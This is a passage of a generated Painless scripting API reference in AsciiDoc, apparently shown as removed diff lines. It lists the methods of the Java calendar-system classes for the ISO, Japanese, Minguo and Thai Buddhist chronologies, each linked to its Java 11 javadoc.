{java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null 
{java11-javadoc}/java.base/java/time/chrono/Era.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/HijrahEra.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IsoChronology]] -==== IsoChronology -* static IsoChronology {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#INSTANCE[INSTANCE] -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#date(int,int,int)[date](int, int, int) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#dateEpochDay(long)[dateEpochDay](long) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* IsoEra {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* LocalDateTime {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* Period {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange 
{java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* LocalDate {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ZonedDateTime {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ZonedDateTime {java11-javadoc}/java.base/java/time/chrono/IsoChronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-IsoEra]] -==== IsoEra -* static IsoEra {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#BCE[BCE] -* static IsoEra {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#CE[CE] -* static IsoEra {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#of(int)[of](int) -* static IsoEra {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#valueOf(java.lang.String)[valueOf](null) -* static IsoEra[] {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/chrono/Era.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/IsoEra.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-JapaneseChronology]] -==== JapaneseChronology -* static JapaneseChronology {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#INSTANCE[INSTANCE] -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#date(int,int,int)[date](int, int, int) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, 
int, int, int) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#dateEpochDay(long)[dateEpochDay](long) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/Chronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange {java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseChronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-JapaneseDate]] -==== JapaneseDate -* static JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#of(int,int,int)[of](int, int, int) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#atTime(java.time.LocalTime)[atTime](LocalTime) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#compareTo(java.time.chrono.ChronoLocalDate)[compareTo](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int 
{java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* JapaneseChronology {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#getChronology()[getChronology]() -* JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#getEra()[getEra]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isAfter(java.time.chrono.ChronoLocalDate)[isAfter](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isBefore(java.time.chrono.ChronoLocalDate)[isBefore](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isEqual(java.time.chrono.ChronoLocalDate)[isEqual](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isLeapYear()[isLeapYear]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfMonth()[lengthOfMonth]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfYear()[lengthOfYear]() -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toEpochDay()[toEpochDay]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toString()[toString]() -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#until(java.time.chrono.ChronoLocalDate)[until](ChronoLocalDate) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* JapaneseDate {java11-javadoc}/java.base/java/time/chrono/JapaneseDate.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) - - -[[painless-api-reference-shared-JapaneseEra]] -==== JapaneseEra -* static JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#HEISEI[HEISEI] -* static JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#MEIJI[MEIJI] -* static JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#SHOWA[SHOWA] -* static JapaneseEra 
{java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#TAISHO[TAISHO] -* static JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#of(int)[of](int) -* static JapaneseEra {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#valueOf(java.lang.String)[valueOf](null) -* static JapaneseEra[] {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/chrono/Era.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/JapaneseEra.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-MinguoChronology]] -==== MinguoChronology -* static MinguoChronology {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#INSTANCE[INSTANCE] -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#date(int,int,int)[date](int, int, int) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#dateEpochDay(long)[dateEpochDay](long) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int 
{java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/Chronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange {java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoChronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-MinguoDate]] -==== MinguoDate -* static MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#of(int,int,int)[of](int, int, int) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#atTime(java.time.LocalTime)[atTime](LocalTime) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#compareTo(java.time.chrono.ChronoLocalDate)[compareTo](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* MinguoChronology {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#getChronology()[getChronology]() -* MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#getEra()[getEra]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isAfter(java.time.chrono.ChronoLocalDate)[isAfter](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isBefore(java.time.chrono.ChronoLocalDate)[isBefore](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isEqual(java.time.chrono.ChronoLocalDate)[isEqual](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isLeapYear()[isLeapYear]() -* boolean 
{java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfMonth()[lengthOfMonth]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#lengthOfYear()[lengthOfYear]() -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#minus(java.time.temporal.TemporalAmount)[minus](TemporalAmount) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#minus(long,java.time.temporal.TemporalUnit)[minus](long, TemporalUnit) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#plus(java.time.temporal.TemporalAmount)[plus](TemporalAmount) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#plus(long,java.time.temporal.TemporalUnit)[plus](long, TemporalUnit) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toEpochDay()[toEpochDay]() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#toString()[toString]() -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#until(java.time.chrono.ChronoLocalDate)[until](ChronoLocalDate) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#with(java.time.temporal.TemporalAdjuster)[with](TemporalAdjuster) -* MinguoDate {java11-javadoc}/java.base/java/time/chrono/MinguoDate.html#with(java.time.temporal.TemporalField,long)[with](TemporalField, long) - - -[[painless-api-reference-shared-MinguoEra]] -==== MinguoEra -* static MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#BEFORE_ROC[BEFORE_ROC] -* static MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#ROC[ROC] -* static MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#of(int)[of](int) -* static MinguoEra {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#valueOf(java.lang.String)[valueOf](null) -* static MinguoEra[] {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#values()[values]() -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* null {java11-javadoc}/java.base/java/time/chrono/Era.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/MinguoEra.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean 
{java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ThaiBuddhistChronology]] -==== ThaiBuddhistChronology -* static ThaiBuddhistChronology {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#INSTANCE[INSTANCE] -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#compareTo(java.time.chrono.Chronology)[compareTo](Chronology) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#date(java.time.temporal.TemporalAccessor)[date](TemporalAccessor) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#date(int,int,int)[date](int, int, int) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#date(java.time.chrono.Era,int,int,int)[date](Era, int, int, int) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#dateEpochDay(long)[dateEpochDay](long) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#dateYearDay(int,int)[dateYearDay](int, int) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#dateYearDay(java.time.chrono.Era,int,int)[dateYearDay](Era, int, int) -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#equals(java.lang.Object)[equals](Object) -* ThaiBuddhistEra {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#eraOf(int)[eraOf](int) -* List {java11-javadoc}/java.base/java/time/chrono/Chronology.html#eras()[eras]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getDisplayName(java.time.format.TextStyle,java.util.Locale)[getDisplayName](TextStyle, Locale) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#getId()[getId]() -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/Chronology.html#isLeapYear(long)[isLeapYear](long) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#localDateTime(java.time.temporal.TemporalAccessor)[localDateTime](TemporalAccessor) -* ChronoPeriod {java11-javadoc}/java.base/java/time/chrono/Chronology.html#period(int,int,int)[period](int, int, int) -* int {java11-javadoc}/java.base/java/time/chrono/Chronology.html#prolepticYear(java.time.chrono.Era,int)[prolepticYear](Era, int) -* ValueRange {java11-javadoc}/java.base/java/time/chrono/Chronology.html#range(java.time.temporal.ChronoField)[range](ChronoField) -* ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistChronology.html#resolveDate(java.util.Map,java.time.format.ResolverStyle)[resolveDate](Map, ResolverStyle) -* null {java11-javadoc}/java.base/java/time/chrono/Chronology.html#toString()[toString]() -* 
ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.temporal.TemporalAccessor)[zonedDateTime](TemporalAccessor) -* ChronoZonedDateTime {java11-javadoc}/java.base/java/time/chrono/Chronology.html#zonedDateTime(java.time.Instant,java.time.ZoneId)[zonedDateTime](Instant, ZoneId) - - -[[painless-api-reference-shared-ThaiBuddhistDate]] -==== ThaiBuddhistDate -* static ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#from(java.time.temporal.TemporalAccessor)[from](TemporalAccessor) -* static ThaiBuddhistDate {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#of(int,int,int)[of](int, int, int) -* Temporal {java11-javadoc}/java.base/java/time/temporal/TemporalAdjuster.html#adjustInto(java.time.temporal.Temporal)[adjustInto](Temporal) -* ChronoLocalDateTime {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#atTime(java.time.LocalTime)[atTime](LocalTime) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#compareTo(java.time.chrono.ChronoLocalDate)[compareTo](ChronoLocalDate) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* ThaiBuddhistChronology {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#getChronology()[getChronology]() -* ThaiBuddhistEra {java11-javadoc}/java.base/java/time/chrono/ThaiBuddhistDate.html#getEra()[getEra]() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* int {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoLocalDate.html#isAfter(java.time.chrono.ChronoLocalDate)[isAfter](ChronoLocalDate) -* boolean 